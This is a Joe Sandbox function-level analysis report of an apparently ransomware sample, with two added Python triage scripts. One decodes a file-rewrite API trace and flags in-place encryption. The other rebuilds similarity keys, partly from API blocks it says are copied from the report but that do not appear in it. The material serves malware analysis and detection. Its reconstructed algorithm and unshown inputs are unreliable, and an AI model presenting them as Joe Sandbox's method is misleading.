                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                                      • String ID:
                                      • API String ID: 2678502038-0
                                      • Opcode ID: 5ecbc7f888ba72d85bb0d4fac46a3f1e6bdeee6630c2e38165c2391fb86081a2
                                      • Instruction ID: 8813035ef570060b018b847f5ce8213b823c4f492556ccd0319d3f84dbb87253
                                      • Opcode Fuzzy Hash: 5ecbc7f888ba72d85bb0d4fac46a3f1e6bdeee6630c2e38165c2391fb86081a2
                                      • Instruction Fuzzy Hash: 9F314E30B842516FDF15AB784882FFF77B95F95304F0405A9D462D7282DB248D49C793
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5,00000000,76233560), ref: 008BD66D
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 008BD695
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 008BD6EE
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 008BD728
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-009D0110,00000000,-009D0110,00000000), ref: 008BD79F
                                      • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD92B
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD967
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD96E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: File$Pointer$CloseCreateErrorHandleModeReadSizeWrite
                                      • String ID:
                                      • API String ID: 1214154791-0
                                      • Opcode ID: 9c131f554c24d56d6ebbf1b13897ec23a166700c21bc9380bdf1be8f81f89838
                                      • Instruction ID: 002b873a9d7d533e8e65bc5a697d28306ca8b8777206d75d9ff22828932c3730
                                      • Opcode Fuzzy Hash: 9c131f554c24d56d6ebbf1b13897ec23a166700c21bc9380bdf1be8f81f89838
                                      • Instruction Fuzzy Hash: 51D1AB70901358EBEB25DFA8CC85BDEBBB5FB45304F208199E418AB291E7B45A84CF51
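The eight calls in the function above (SetErrorMode, CreateFileW, GetFileSize, SetFilePointerEx, ReadFile, SetFilePointerEx, WriteFile, CloseHandle, all on one handle) are the shape of an in-place file rewrite, which is how ransomware typically encrypts a file without creating a new one. The hex arguments decode to: SetErrorMode(0x8003) = SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX (suppress error dialogs while sweeping files), and CreateFileW with dwDesiredAccess 0xC0000000 = GENERIC_READ | GENERIC_WRITE, dwShareMode 0, dwCreationDisposition 3 = OPEN_EXISTING and dwFlagsAndAttributes 0x08000000 = FILE_FLAG_SEQUENTIAL_SCAN. The Python below is an added example and not part of the Joe Sandbox report or its tooling: it parses these API lines (copied from the block above), decodes the Win32 constants and flags the open-read-seek-write-close pattern. It assumes the `Api.MODULE(args), ref: ADDRESS` line layout used in this report; unknown stack slots shown as `?` are treated as 0 so the decode stays conservative.

```python
import re

# API trace of the routine at 008BD66D..008BD96E, copied verbatim from the
# Joe Sandbox function summary above. The parser and decoders are an added
# example, not Joe Sandbox tooling.
TRACE = """\
SetErrorMode.KERNEL32(00008003,BA3649C5,00000000,76233560), ref: 008BD66D
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 008BD695
GetFileSize.KERNEL32(00000000,00000000), ref: 008BD6EE
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 008BD728
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-009D0110,00000000,-009D0110,00000000), ref: 008BD79F
SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD92B
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD967
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD96E
"""

# Assumed line layout: "Api.MODULE(arg,arg,...), ref: ADDRESS" as rendered in this report.
LINE_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]{8})$")

# Win32 constants from winnt.h / winbase.h (documented values).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
CREATION_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                        4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x20000000: "FILE_FLAG_NO_BUFFERING", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x00000080: "FILE_ATTRIBUTE_NORMAL"}
ERROR_MODE = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
              0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}


def parse_trace(text):
    """Turn the summary lines into dicts; '?' (unknown stack slot) becomes None."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        api, module, raw_args, ref = m.groups()
        args = [None if a == "?" else int(a, 16) for a in raw_args.split(",")]
        calls.append({"api": api, "module": module, "args": args, "ref": ref})
    return calls


def decode_flags(value, table):
    """Name every known bit in value; leftover bits are reported as hex."""
    names, rest = [], value
    for bit, name in table.items():
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return names


def decode_create_file(args):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile). Unknown ('?')
    slots decode as 0 so nothing is claimed that the trace does not show."""
    access, share, disposition, flags = [0 if a is None else a
                                        for a in (args[1], args[2], args[4], args[5])]
    return {
        "access": decode_flags(access, GENERIC_ACCESS),
        "share": "no sharing" if share == 0 else f"0x{share:X}",
        "disposition": CREATION_DISPOSITION.get(disposition, f"0x{disposition:X}"),
        "flags": decode_flags(flags, FILE_FLAGS),
    }


def in_place_rewrite(calls):
    """True when one routine opens an existing file read+write, reads it, seeks,
    writes it back and closes it: the shape of in-place file encryption."""
    seq = [c["api"] for c in calls]
    try:
        i_open = seq.index("CreateFileW")
        i_read = seq.index("ReadFile", i_open)
        i_seek = seq.index("SetFilePointerEx", i_read)
        i_write = seq.index("WriteFile", i_seek)
        seq.index("CloseHandle", i_write)
    except ValueError:
        return False
    info = decode_create_file(calls[i_open]["args"])
    wants_rw = {"GENERIC_READ", "GENERIC_WRITE"} <= set(info["access"])
    return wants_rw and info["disposition"] == "OPEN_EXISTING"


def summarize(text):
    """Decode the trace into a small triage report."""
    calls = parse_trace(text)
    report = {"in_place_rewrite": in_place_rewrite(calls)}
    for c in calls:
        if c["api"] == "SetErrorMode":
            report["error_mode"] = decode_flags(c["args"][0], ERROR_MODE)
        elif c["api"] == "CreateFileW":
            report["create_file"] = decode_create_file(c["args"])
    return report


if __name__ == "__main__":
    print(summarize(TRACE))
```

The sequence check deliberately requires OPEN_EXISTING together with read and write access: a routine that opens with CREATE_ALWAYS or writes to a second handle is a copy, not an overwrite, and a read-only open is ordinary file inspection. GetFileSize and the first SetFilePointerEx are not required by the matcher because their arguments are mostly unresolved (`?`) in this summary.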
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0094F79F
                                      • List.LIBCONCRT ref: 0094F81D
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094F842
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094F850
                                      • __EH_prolog3.LIBCMT ref: 0094F85D
                                      • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0094F881
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FreeH_prolog3ProcessorVirtual$Concurrency::details::Exception@8ListRootRoot::Throwstd::invalid_argument::invalid_argument
                                      • String ID: pExecutionResource
                                      • API String ID: 721108208-359481074
                                      • Opcode ID: 2d338a8bd1235303fb9945d7e200747cf0e3c735c3dcd72066692c9544b8a52d
                                      • Instruction ID: 63f85c24f3e0ce04d138b225a07dde6a9201ce9d17fa1f3c717bdebf486cbc5e
                                      • Opcode Fuzzy Hash: 2d338a8bd1235303fb9945d7e200747cf0e3c735c3dcd72066692c9544b8a52d
                                      • Instruction Fuzzy Hash: 342196B5A40705ABCB08EF64C892FAD77A5BFC8300F514029F9056B391DBB4AE45CB91
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,?,?,009747F0,00000001,00000001,FF76E900), ref: 009745F9
                                      • __alloca_probe_16.LIBCMT ref: 00974631
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009747F0,00000001,00000001,FF76E900,?,?,?), ref: 0097467F
                                      • __alloca_probe_16.LIBCMT ref: 00974716
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,FF76E900,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00974779
                                      • __freea.LIBCMT ref: 00974786
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • __freea.LIBCMT ref: 0097478F
                                      • __freea.LIBCMT ref: 009747B4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: 1e2caa057b1d42bdb24a2a9725035414ef2cbe5bdc18c278bcb34cff11f70865
                                      • Instruction ID: 3e2d86b52debef99aec2d18788ffadf564e5e1825a73406a7cc3daf5518cea79
                                      • Opcode Fuzzy Hash: 1e2caa057b1d42bdb24a2a9725035414ef2cbe5bdc18c278bcb34cff11f70865
                                      • Instruction Fuzzy Hash: CA51D173610216AFEB299E64CC81FBB77AEEB81750F158629FC08D7141EB34DC40D691
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$EnvironmentVariable
                                      • String ID:
                                      • API String ID: 1464849758-0
                                      • Opcode ID: 6d380abf27b04f1058aaaffce21094a36af7fd01093af9e0b9a6039befec3cef
                                      • Instruction ID: 46b885238e60aed36238e832f964573912b53d4ad32b23d63513aa0c571ca81c
                                      • Opcode Fuzzy Hash: 6d380abf27b04f1058aaaffce21094a36af7fd01093af9e0b9a6039befec3cef
                                      • Instruction Fuzzy Hash: 2E6104B3949700AFDB20AF788841B7E7BA9EF45720F05C16EF90C97282EB759D408790
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F6FA3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F6FE3
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F7181
                                      Strings
                                      • : invalid ciphertext, xrefs: 008F6FB7
                                      • PK_DefaultEncryptionFilter: plaintext too long, xrefs: 008F7158
                                      • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 008F6F7A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long
                                      • API String ID: 2005118841-2902848663
                                      • Opcode ID: 789189a86dd4ee86ab21d26ff751bc5ae12a36bbbbd5b2ec3774bc5c880f8372
                                      • Instruction ID: c63567c4f880d58850698b59143c81adbb139c6f2c54712e3f49f8cbd6ac6ad2
                                      • Opcode Fuzzy Hash: 789189a86dd4ee86ab21d26ff751bc5ae12a36bbbbd5b2ec3774bc5c880f8372
                                      • Instruction Fuzzy Hash: 4CB17A71A007099FCB24DFA9C894FAABBF5FF48714F104A2CE646D7690EB71A914CB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate
                                      • String ID: PATH$\
                                      • API String ID: 124695548-1896636505
                                      • Opcode ID: 4192f65b7577d6112990d54e6e9edceac7b81f5aa0851a0d3c49440bef5d309a
                                      • Instruction ID: aa4d450965269f85e367d7c9b9ea778c80c8fc181d4018129c7f62860191aa98
                                      • Opcode Fuzzy Hash: 4192f65b7577d6112990d54e6e9edceac7b81f5aa0851a0d3c49440bef5d309a
                                      • Instruction Fuzzy Hash: 54716A739443026EDF25AF64DC49BBF7BAD9F81320F258059F408AB2D2EE718D418765
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,0096B33E,E0830C40,?,?,?,?,?,?,00975F21,00929776,0096B33E,?,0096B33E,0096B33E,00929776), ref: 009757EE
                                      • __fassign.LIBCMT ref: 00975869
                                      • __fassign.LIBCMT ref: 00975884
                                      • WideCharToMultiByte.KERNEL32(?,00000000,0096B33E,00000001,?,00000005,00000000,00000000), ref: 009758AA
                                      • WriteFile.KERNEL32(?,?,00000000,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 009758C9
                                      • WriteFile.KERNEL32(?,00929776,00000001,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 00975902
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 19ec308a94a784dc4015bb92eb790db8176c16a5b536a55cdb97126126b20a1d
                                      • Instruction ID: d8f330c210e61f6a6aba577e348a8a2b6b21f61ad008fb725daebac4d9f38282
                                      • Opcode Fuzzy Hash: 19ec308a94a784dc4015bb92eb790db8176c16a5b536a55cdb97126126b20a1d
                                      • Instruction Fuzzy Hash: 5851B272A04649DFCB10CFA8D885AEEBBF8EF09310F15815AE959E7251E7709D40CB61
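The "API ID" under each function's Similarity block is a key derived from the names in that function's "APIs" list, and it is the value an analyst would reuse to match this ransomware's functions against other samples. The following is an added example, not Joe Sandbox's own code and not its published algorithm: the tokenisation rules (split a symbol before every capital letter, drop fragments of three characters or fewer, bucket the fragments by how often they occur across all listed calls including "Part of subcall function" entries, sort each bucket by code point, join buckets with "$") are an inference from the values printed in this report, and are labelled as an assumption in the code. The three sample blocks are copied from this report so the reconstruction can be checked against the report's own API IDs.

```python
"""Added example (not Joe Sandbox's code): rebuild the "API ID" similarity key
printed under "Similarity" from a function's "APIs" bullets.  The rules are
inferred from this report's own values and are an assumption, not a documented
Joe Sandbox algorithm."""
import re
from collections import Counter
from itertools import groupby

# One bullet of an "APIs" list.  Handles direct calls with an argument list and
# "Part of subcall function XXXXXXXX:" entries, with or without arguments.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9_@]+)"
    r"(?P<args>\(.*\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)

# Assumption: fragments of three characters or fewer (Get, Set, Tls, To, Cxx, ...)
# never show up in the report's API IDs, so they are discarded.
MIN_TOKEN_LEN = 4


def parse_api_block(text):
    """Return one dict (name, module, args, ref, caller) per bullet in an APIs block."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError("unrecognised API line: %r" % line)
        calls.append(m.groupdict())
    return calls


def tokenize(symbol):
    """Split before every capital letter; keep fragments of MIN_TOKEN_LEN or more."""
    return [t for t in re.split(r"(?=[A-Z])", symbol) if len(t) >= MIN_TOKEN_LEN]


def api_id(names):
    """Bucket tokens by occurrence count (highest first); sort each bucket by code
    point and concatenate it; join the buckets with '$'."""
    counts = Counter(tok for name in names for tok in tokenize(name))
    ordered = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    buckets = ["".join(tok for tok, _ in grp)
               for _, grp in groupby(ordered, key=lambda kv: kv[1])]
    return "$".join(buckets)


def api_id_for_block(text):
    """Parse an APIs block and compute its API ID (subcall entries count too)."""
    return api_id([c["name"] for c in parse_api_block(text)])


# APIs blocks copied from this report: the WriteFile helper at 009757EE, the
# std::_Lockit facet initialiser at 008E9619 and the
# GetLogicalProcessorInformation wrapper at 00942FCC.
WRITEFILE_BLOCK = """
• GetConsoleCP.KERNEL32(?,0096B33E,E0830C40,?,?,?,?,?,?,00975F21,00929776,0096B33E,?,0096B33E,0096B33E,00929776), ref: 009757EE
• __fassign.LIBCMT ref: 00975869
• __fassign.LIBCMT ref: 00975884
• WideCharToMultiByte.KERNEL32(?,00000000,0096B33E,00000001,?,00000005,00000000,00000000), ref: 009758AA
• WriteFile.KERNEL32(?,?,00000000,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 009758C9
• WriteFile.KERNEL32(?,00929776,00000001,00975F21,00000000,?,?,?,?,?,?,?,?,?,00975F21,00929776), ref: 00975902
"""

LOCKIT_BLOCK = """
• std::_Lockit::_Lockit.LIBCPMT ref: 008E9619
• std::_Lockit::_Lockit.LIBCPMT ref: 008E963B
• std::_Lockit::~_Lockit.LIBCPMT ref: 008E965B
• __Getctype.LIBCPMT ref: 008E96F1
• std::_Facet_Register.LIBCPMT ref: 008E9710
• std::_Lockit::~_Lockit.LIBCPMT ref: 008E9728
"""

CONCRT_BLOCK = """
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FCC
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FD2
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00942FFF
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 00943009
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00942729,?,?,?,00000000), ref: 0094301B
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00943031
• __CxxThrowException@8.LIBVCRUNTIME ref: 0094303F
"""

if __name__ == "__main__":
    for block in (WRITEFILE_BLOCK, LOCKIT_BLOCK, CONCRT_BLOCK):
        print(api_id_for_block(block))
```

Because the key is built from the runtime symbols a function calls rather than from its bytes, two builds of the same CRT or ConcRT routine share an API ID even when their Opcode and Instruction fuzzy hashes differ; the "API String ID" pairs that key with the function's string references, whose hashing is not reconstructed here.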
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                      • String ID:
                                      • API String ID: 2755674607-0
                                      • Opcode ID: 4bc41e61597825a033299733f36334d64ba777d757f6a94da1c55a8c24922f22
                                      • Instruction ID: 27099b16249e8bbf22ef8990f4159af2eadb0918971ad72e836d5170d2a73541
                                      • Opcode Fuzzy Hash: 4bc41e61597825a033299733f36334d64ba777d757f6a94da1c55a8c24922f22
                                      • Instruction Fuzzy Hash: FC51E371D04759CFCB10DF29D841BAAB7B4FF59310F14426AE846AB352EB31A981CBD1
                                      APIs
                                      • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00953109
                                        • Part of subcall function 00952E76: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00952EA9
                                        • Part of subcall function 00952E76: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00952ECB
                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00953186
                                      • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00953192
                                      • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 009531A1
                                      • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 009531AB
                                      • Concurrency::location::_Assign.LIBCMT ref: 009531DF
                                      • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 009531E7
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                      • String ID:
                                      • API String ID: 1924466884-0
                                      • Opcode ID: d6e76b50500be7162053595e0ddcf221587e03db1780aaa80cfa1a137eee6db9
                                      • Instruction ID: 3c42cf0aa948ff49b945b94927467b8dbea3dadcaeca1bb454530f55b586bef4
                                      • Opcode Fuzzy Hash: d6e76b50500be7162053595e0ddcf221587e03db1780aaa80cfa1a137eee6db9
                                      • Instruction Fuzzy Hash: D7415A35A00208DFCB04EF65C485BADB7B9FF88351F1480AADD059B242DB30AA45CB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
